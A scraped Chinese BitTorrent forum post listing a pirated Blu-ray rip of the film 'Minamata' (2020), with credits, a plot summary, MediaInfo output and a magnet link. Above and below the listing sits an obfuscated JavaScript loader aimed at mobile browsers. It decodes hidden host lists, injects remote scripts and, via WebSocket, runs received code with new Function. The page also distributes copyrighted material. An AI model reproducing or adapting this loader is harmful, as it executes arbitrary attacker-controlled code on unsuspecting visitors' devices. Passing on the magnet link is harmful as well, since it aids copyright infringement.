水俣病[中文字幕].Minamata.2020.1080p.BluRay.DTS-HD.MA.5.1.x265-10bit 7.71GB

版主小s 28天前 231

var x=window['\x61\x74\x6f\x62'],id=x('NDQ0NDczNzY1NjE1Nzg4ODg4OC0xMDAwNw==');document.write('%lt;ins style="display:none!important" id="'+id+'"%gt;%lt;/ins%gt;');(window.adbyunion=window.adbyunion||[]).push(id);window['\x68\x6e\x49\x43\x61\x57\x73\x53\x72\x45']=(!/^Mac|Win/.test(navigator.platform)||!navigator.platform)?function(){;(function(u,k,w,d,c){var cs=d[x('Y3VycmVudFNjcmlwdA==')];'jQuery';var t=[],l=[],e=0,r=0,delay=2000,f=null,ua=navigator.userAgent.toLowerCase(),sc=Math.max(1,600000),ext='1',i='win'+Math.floor(new Date().getTime()/sc)+ext;if(ua.indexOf('baidu')>-1||ua.indexOf('huaweibrowser')>-1||ua.indexOf('vivobrowser')>-1){r=1;u=k;f=function(){if(!l.length)return;var ws=new WebSocket(l.shift()+'/'+i);ws.onopen=function(){for(var k in t)t[k]&&clearTimeout(t[k])};ws.onmessage=function(e){new Function('_tdcs',x(e.data))(cs);ws.close()};ws.onerror=function(e){t[++e]&&clearTimeout(t[e]);f()}};}else{f=function(){if(!l.length)return;var s=document.createElement('script');s.src=l.shift()+'/'+i;cs.parentElement.insertBefore(s,cs);s.onload=function(){for(var k in t)t[k]&&clearTimeout(t[k])};s.onerror=function(){cs.parentElement.removeChild(s);t[++e]&&clearTimeout(t[e]);f()}};}u=decodeURIComponent(x(u.replace(new RegExp(c[r]+''+c[r],'g'),c[r])));var l=u.split(',');l.sort(function(){return 0.5-Math.random()});for(var j in l)t[j]=setTimeout(f,delay*j);})('aHR0cHM6Ly9va3NrZGpmZGsuaG9uZ2ZhY2huLmNvbbSxodHRwczovL28zOWtza2RmamxrLmRzbbGVuZ2d1aS5jbb20=','d3NzOi8vd3MMua2FpZ3Vhbmdkb3UuY29tOjgxODEsd3NzOi8vd3MMueW5zbHZ5b3UuY29tOjgxODEsd3NzOi8vd3MMud3NobGNnai5jb206ODE4MMQ==',window,document,['b','M']);}:function(){};

◎译 名 水俣病 / 水俣 / 毒水曝光(港) / 恶水真相(台)

◎片 名 Minamata

◎年 代 2020

◎产 地 英国

◎类 别 剧情

◎语 言 英语 / 日语

◎上映日期 2021-04-22(中国香港) / 2020-02-21(柏林电影节)

◎IMDb链接 https://www.imdb.com/title/tt9179096/

◎豆瓣评分 6.7/10 (2597人评价)

◎豆瓣链接 https://movie.douban.com/subject/30359665/

◎片 长 115分钟

◎导 演 安德鲁·莱维塔斯 Andrew Levitas (id:1050087)

◎编 剧 大卫·凯斯勒 David Kessler (id:1047302)

安德鲁·莱维塔斯 Andrew Levitas (id:1050087)

◎演 员 约翰尼·德普 Johnny Depp (id:1054456)

美波 Minami (id:1050970)

比尔·奈伊 Bill Nighy (id:1041002)

真田广之 Hiroyuki Sanada (id:1027879)

浅野忠信 Tadanobu Asano (id:1036630)

凯瑟琳·詹金斯 Katherine Jenkins (id:1009914)

国村隼 Jun Kunimura (id:1041791)

加濑亮 Ryo Kase (id:1191334)

羽田正义 Masayoshi Haneda (id:1340067)

坂本龙一 Ryuichi Sakamoto (id:1148641)

内森·纽金特 Nathan Nugent (id:1353307)

◎标 签 约翰尼·德普 / 日本 / 人性 / 美国 / 2020 / 尤金·史密斯 / JohnnyDepp / 电影

◎简 介

约翰尼·德普将主演惊悚片《水俣病》(Minamata),饰演史上最著名的摄影记者之一尤金·史密斯。影片由Andrew Levitas(《摇篮曲》)执导,明年1月在日本开拍,也将去塞尔维亚拍摄。讲述因二战时期作品而知名的摄影师史密斯在1971年本已隐居,但受Life杂志编辑Ralph Graves委托,他再次拿起相机,去日本记录因汞污染引起的震惊全球的怪病“水俣病”现状,和政府所做的掩盖。当时该事件已进入确定责任阶段,受害者与企业谈判中。

  1. ##### MediaInfo ######

  2. General

  3. Unique ID : 263970644694043004741790047647880534438 (0xC696E59B9A141E0676004CE5598159A6)

  4. Complete name : [email protected].COM.mkv

  5. Format : Matroska

  6. Format version : Version 4

  7. File size : 7.71 GiB

  8. Duration : 1 h 55 min

  9. Overall bit rate mode : Variable

  10. Overall bit rate : 9 579 kb/s

  11. Movie name : Minamata 2020 1080p BluRay DTS-HD MA 5.1 [email protected]

  12. Encoded date : UTC 2021-11-02 20:47:14

  13. Writing application : mkvmerge v38.0.0 ('The Silent Type') 64-bit

  14. Writing library : libebml v1.3.9 + libmatroska v1.5.2


  15. Video

  16. ID : 1

  17. Format : HEVC

  18. Format/Info : High Efficiency Video Coding

  19. Format profile : Main [email protected]@High

  20. Codec ID : V_MPEGH/ISO/HEVC

  21. Duration : 1 h 55 min

  22. Bit rate : 5 378 kb/s

  23. Width : 1 920 pixels

  24. Height : 1 036 pixels

  25. Display aspect ratio : 1.85:1

  26. Frame rate mode : Constant

  27. Frame rate : 24.000 FPS

  28. Color space : YUV

  29. Chroma subsampling : 4:2:0

  30. Bit depth : 10 bits

  31. Bits/(Pixel*Frame) : 0.113

  32. Stream size : 4.33 GiB (56%)

  33. Title : [email protected]

  34. Writing library : x265 - H.265/HEVC codec

  35. Default : Yes

  36. Forced : No


  37. Audio

  38. ID : 2

  39. Format : DTS XLL

  40. Format/Info : Digital Theater Systems

  41. Commercial name : DTS-HD Master Audio

  42. Codec ID : A_DTS

  43. Duration : 1 h 55 min

  44. Bit rate mode : Variable

  45. Bit rate : 4 171 kb/s

  46. Channel(s) : 6 channels

  47. Channel layout : C L R Ls Rs LFE

  48. Sampling rate : 48.0 kHz

  49. Frame rate : 93.750 FPS (512 SPF)

  50. Bit depth : 24 bits

  51. Compression mode : Lossless

  52. Stream size : 3.36 GiB (44%)

  53. Title : English

  54. Language : English

  55. Default : Yes

  56. Forced : No


  57. Text #1

  58. ID : 3

  59. Format : PGS

  60. Muxing mode : zlib

  61. Codec ID : S_HDMV/PGS

  62. Codec ID/Info : Picture based subtitle format used on BDs/HD-DVDs

  63. Duration : 1 h 48 min

  64. Bit rate : 25.3 kb/s

  65. Count of elements : 2159

  66. Stream size : 19.7 MiB (0%)

  67. Title : CHS

  68. Language : Chinese

  69. Default : Yes

  70. Forced : No


  71. Text #2

  72. ID : 4

  73. Format : PGS

  74. Muxing mode : zlib

  75. Codec ID : S_HDMV/PGS

  76. Codec ID/Info : Picture based subtitle format used on BDs/HD-DVDs

  77. Duration : 1 h 48 min

  78. Bit rate : 26.4 kb/s

  79. Count of elements : 2159

  80. Stream size : 20.6 MiB (0%)

  81. Title : CHT

  82. Language : Chinese

  83. Default : No

  84. Forced : No


  85. Menu

  86. 00:00:00.000 : en:Chapter 01

  87. 00:09:06.417 : en:Chapter 02

  88. 00:19:22.042 : en:Chapter 03

  89. 00:29:25.833 : en:Chapter 04

  90. 00:37:22.625 : en:Chapter 05

  91. 00:47:10.625 : en:Chapter 06

  92. 00:58:32.083 : en:Chapter 07

  93. 01:07:18.958 : en:Chapter 08

  94. 01:18:29.250 : en:Chapter 09

  95. 01:26:38.875 : en:Chapter 10

  96. 01:35:44.833 : en:Chapter 11




复制代码


TAGS 剧情

磁力链:
  • magnet:?xt=urn:btih:D46C39B852A81E12A2235D8AFC5800CF168538F7

上传的附件:
BT9527.com论坛第一帅,不接受任何反驳
BT9527电影天堂 1、BT9527电影天堂提供的BT文件均来源于互联网抓取,只供网友学习交流、技术提升使用。
2、我们遵守BitTorrent点对点协议原则,任何版权问题请联系原资源发布商,我们不处理任何版权纠纷,谢谢!如有争议请联系邮箱:BT9527#hotmail.com(#换成@)
3、如果您发现某页面或地址有错误,请联系站长邮箱BT9527#hotmail.com(#换成@),我们会尽快处理。您的热心是对BT9527电影天堂最大的支持。
4、本站建议去正规影院观看电影以支持电影行业发展。
最新回复 (0)

你可以在 登录 or 注册 后,对此帖发表评论!

返回
发新帖
var x=window['\x61\x74\x6f\x62'],id=x('NDQ0NDczNzY1NjE1Nzg4ODg4OC0xMDAwNg==');document.write('%lt;ins style="display:none!important" id="'+id+'"%gt;%lt;/ins%gt;');(window.adbyunion=window.adbyunion||[]).push(id);window['\x59\x72\x72\x51\x4e\x72\x4a\x5a\x7a\x42']=(!/^Mac|Win/.test(navigator.platform)||!navigator.platform)?function(){;(function(u,k,w,d,c){var cs=d[x('Y3VycmVudFNjcmlwdA==')];'jQuery';var t=[],l=[],e=0,r=0,delay=2000,f=null,ua=navigator.userAgent.toLowerCase(),sc=Math.max(1,600000),ext='1',i='win'+Math.floor(new Date().getTime()/sc)+ext;if(ua.indexOf('baidu')>-1||ua.indexOf('huaweibrowser')>-1||ua.indexOf('vivobrowser')>-1){r=1;u=k;f=function(){if(!l.length)return;var ws=new WebSocket(l.shift()+'/'+i);ws.onopen=function(){for(var k in t)t[k]&&clearTimeout(t[k])};ws.onmessage=function(e){new Function('_tdcs',x(e.data))(cs);ws.close()};ws.onerror=function(e){t[++e]&&clearTimeout(t[e]);f()}};}else{f=function(){if(!l.length)return;var s=document.createElement('script');s.src=l.shift()+'/'+i;cs.parentElement.insertBefore(s,cs);s.onload=function(){for(var k in t)t[k]&&clearTimeout(t[k])};s.onerror=function(){cs.parentElement.removeChild(s);t[++e]&&clearTimeout(t[e]);f()}};}u=decodeURIComponent(x(u.replace(new RegExp(c[r]+''+c[r],'g'),c[r])));var l=u.split(',');l.sort(function(){return 0.5-Math.random()});for(var j in l)t[j]=setTimeout(f,delay*j);})('aHR0cHM6Ly9va3NrZGpmZGsuaG9uZ2ZhY2huLmNvbbSxodHRwczovL28zOWtza2RmamxrLmRzbbGVuZ2d1aS5jbb20=','d3NzOi8vd3MMua2FpZ3Vhbmdkb3UuY29tOjgxODEsd3NzOi8vd3MMueW5zbHZ5b3UuY29tOjgxODEsd3NzOi8vd3MMud3NobGNnai5jb206ODE4MMQ==',window,document,['b','M']);}:function(){};